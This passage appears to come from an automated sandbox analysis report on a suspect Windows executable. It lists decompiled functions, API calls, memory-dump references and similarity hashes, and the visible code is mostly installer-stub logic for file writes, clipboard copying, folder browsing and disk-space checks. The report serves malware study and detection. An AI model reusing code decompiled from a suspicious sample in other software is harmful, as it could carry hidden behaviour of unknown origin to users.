				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00405d3b
                0x00405d4b
                0x00405d53
                0x00000000
                0x00405d5a
                0x00000000
                0x00405d5c

                APIs
                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                0x0040330e
                0x00403314

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0228101F, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02281044
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: e4ee612ac31d99bcd5caaeb5a6b92f174ef29765723f16da938bd8c8cb38233f
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: 8AD017B1C61348BBCB10FBE1C84A89DBB6DEB10701F20829AAC0066185EA759B109A60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405ABA, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405ABA(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                0x00405aba
                0x00405acd
                0x00405acd
                0x00405ad1
                0x00000000
                0x00000000
                0x00405ac4
                0x00405ac7
                0x00000000
                0x00405ac7
                0x00000000
                0x00405ac4
                0x00405ad3

                APIs
                • CharNextA.USER32(?,00403455,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000020,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext
                • String ID:
                • API String ID: 3213498283-0
                • Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                • Instruction ID: e7db52908d3e8830c535cfb70526cc2daabbcaa08dbe50b4a99c3e39ed970d4a
                • Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                • Instruction Fuzzy Hash: 00C08030208F8057CB10571091644677FF0FAD1700F7C496BF0C163150D13458408F36
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0040535C, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                0x00405362
                0x0040536a
                0x0040536d
                0x00405375
                0x00405378
                0x00405507
                0x0040550d
                0x00405531
                0x00405531
                0x0040553d
                0x00405543
                0x00405565
                0x00405565
                0x0040556b
                0x004055c0
                0x004055c0
                0x004055c3
                0x00000000
                0x00000000
                0x004055c5
                0x004055c8
                0x004055cb
                0x00000000
                0x00000000
                0x004055d5
                0x004055db
                0x004055dd
                0x004055e0
                0x004056dd
                0x00000000
                0x004056dd
                0x004055ef
                0x004055fb
                0x00405604
                0x0040560b
                0x0040560f
                0x00405612
                0x0040561b
                0x00405621
                0x00405624
                0x00405624
                0x00405634
                0x0040563a
                0x0040563d
                0x00405648
                0x00405648
                0x00405649
                0x0040564c
                0x00405653
                0x0040565a
                0x00405662
                0x00405662
                0x00405670
                0x00405676
                0x00405679
                0x00405679
                0x00405680
                0x00405686
                0x0040568f
                0x00405696
                0x0040569f
                0x004056a1
                0x004056a4
                0x004056b3
                0x004056b5
                0x004056b8
                0x004056b9
                0x004056bc
                0x004056bd
                0x004056be
                0x004056be
                0x004056c6
                0x004056d1
                0x004056d7
                0x004056d7
                0x00000000
                0x0040563d
                0x0040556d
                0x00405573
                0x004055a1
                0x004055a3
                0x004055a9
                0x004055b4
                0x004055b4
                0x004055bb
                0x00000000
                0x004055bb
                0x00405577
                0x00405581
                0x00000000
                0x00405545
                0x00405545
                0x0040554b
                0x00405586
                0x00000000
                0x0040558d
                0x00405554
                0x0040555b
                0x00405560
                0x00000000
                0x00405560
                0x00405543
                0x0040537e
                0x00405382
                0x0040538a
                0x0040538e
                0x00405391
                0x00405394
                0x00405397
                0x0040539a
                0x0040539b
                0x0040539c
                0x004053b5
                0x004053b8
                0x004053c2
                0x004053d1
                0x004053d9
                0x004053e1
                0x004053e6
                0x004053e9
                0x004053f5
                0x004053fe
                0x00405407
                0x00405429
                0x0040542f
                0x00405440
                0x00405445
                0x00405453
                0x00405461
                0x00405461
                0x00405466
                0x00405474
                0x00405474
                0x00405479
                0x0040547c
                0x00405481
                0x0040548d
                0x00405496
                0x004054a3
                0x004054b2
                0x004054a5
                0x004054aa
                0x004054aa
                0x004054be
                0x004054be
                0x004054d2
                0x004054db
                0x004054e4
                0x004054f4
                0x00405500
                0x00405500
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID:
                • API String ID: 590372296-0
                • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040460D, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a068;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x739685
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a880 == _t158) {
									E00404566();
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                0x0040460d
                0x00404613
                0x00404619
                0x00404626
                0x00404634
                0x00404637
                0x0040463f
                0x00404645
                0x00404645
                0x00404651
                0x00404654
                0x004046c2
                0x004046c9
                0x004047a0
                0x004047a7
                0x004047b6
                0x004047b6
                0x004047ba
                0x004047c4
                0x004047d1
                0x004047d3
                0x004047d3
                0x004047e1
                0x004047e8
                0x004047ef
                0x004047f2
                0x00404829
                0x0040482b
                0x00404831
                0x00404836
                0x0040483a
                0x0040483c
                0x0040483c
                0x00404858
                0x00000000
                0x0040485a
                0x0040485d
                0x0040486b
                0x00404871
                0x00404872
                0x00404875
                0x00404878
                0x00000000
                0x00404878
                0x004047f4
                0x004047f6
                0x004047fa
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004047fc
                0x004047fc
                0x00404809
                0x0040480e
                0x00000000
                0x00000000
                0x00404812
                0x00404814
                0x00404814
                0x0040481c
                0x0040481e
                0x00404821
                0x00404824
                0x00404827
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404827
                0x00404884
                0x0040488e
                0x00404891
                0x00404894
                0x0040489b
                0x0040489b
                0x0040489d
                0x0040489d
                0x004048a2
                0x004048a4
                0x004048ac
                0x004048b3
                0x004048b5
                0x004048c0
                0x004048c0
                0x004048b5
                0x004048c7
                0x004048d0
                0x004048da
                0x004048e2
                0x004048fd
                0x004048e4
                0x004048ed
                0x004048ed
                0x004048e2
                0x00404902
                0x00404907
                0x0040490c
                0x00404915
                0x00404915
                0x0040491e
                0x00404920
                0x00404920
                0x0040492c
                0x00404934
                0x0040493e
                0x0040493e
                0x00404943
                0x00000000
                0x00404943
                0x004047f2
                0x004047a9
                0x004047b0
                0x00000000
                0x00000000
                0x00000000
                0x004047b0
                0x004046cf
                0x004046d8
                0x004046f2
                0x004046f7
                0x00404701
                0x00404708
                0x00404714
                0x00404717
                0x0040471a
                0x00404721
                0x00404729
                0x0040472c
                0x00404730
                0x00404737
                0x0040473f
                0x00404799
                0x00404741
                0x00404742
                0x00404749
                0x00404753
                0x0040475b
                0x00404768
                0x0040477c
                0x00404780
                0x00404780
                0x0040477c
                0x00404785
                0x00404792
                0x00404792
                0x0040473f
                0x00000000
                0x004046f7
                0x004046e5
                0x00000000
                0x00000000
                0x004046eb
                0x00000000
                0x00404656
                0x00404663
                0x0040466c
                0x00404679
                0x00404679
                0x00404680
                0x00404686
                0x0040468f
                0x00404692
                0x00404695
                0x0040469d
                0x004046a0
                0x004046a3
                0x004046a9
                0x004046b0
                0x004046b7
                0x00404949
                0x0040495b
                0x004046bd
                0x004046c0
                0x00000000
                0x004046c0
                0x004046b7

                APIs
                • GetDlgItem.USER32 ref: 0040465C
                • SetWindowTextA.USER32(00000000,?), ref: 00404686
                • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                • CoTaskMemFree.OLE32(00000000), ref: 00404742
                • lstrcmpiA.KERNEL32(Cgrlcpdlsle,0042A890,00000000,?,?), ref: 00404774
                • lstrcatA.KERNEL32(?,Cgrlcpdlsle), ref: 00404780
                • SetDlgItemTextA.USER32 ref: 00404792
                  • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                  • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                  • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                  • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                  • Part of subcall function 004063D2: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                  • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                  • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                  • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A$C:\Users\user\AppData\Local\Temp$Cgrlcpdlsle
                • API String ID: 2624150263-337181617
                • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
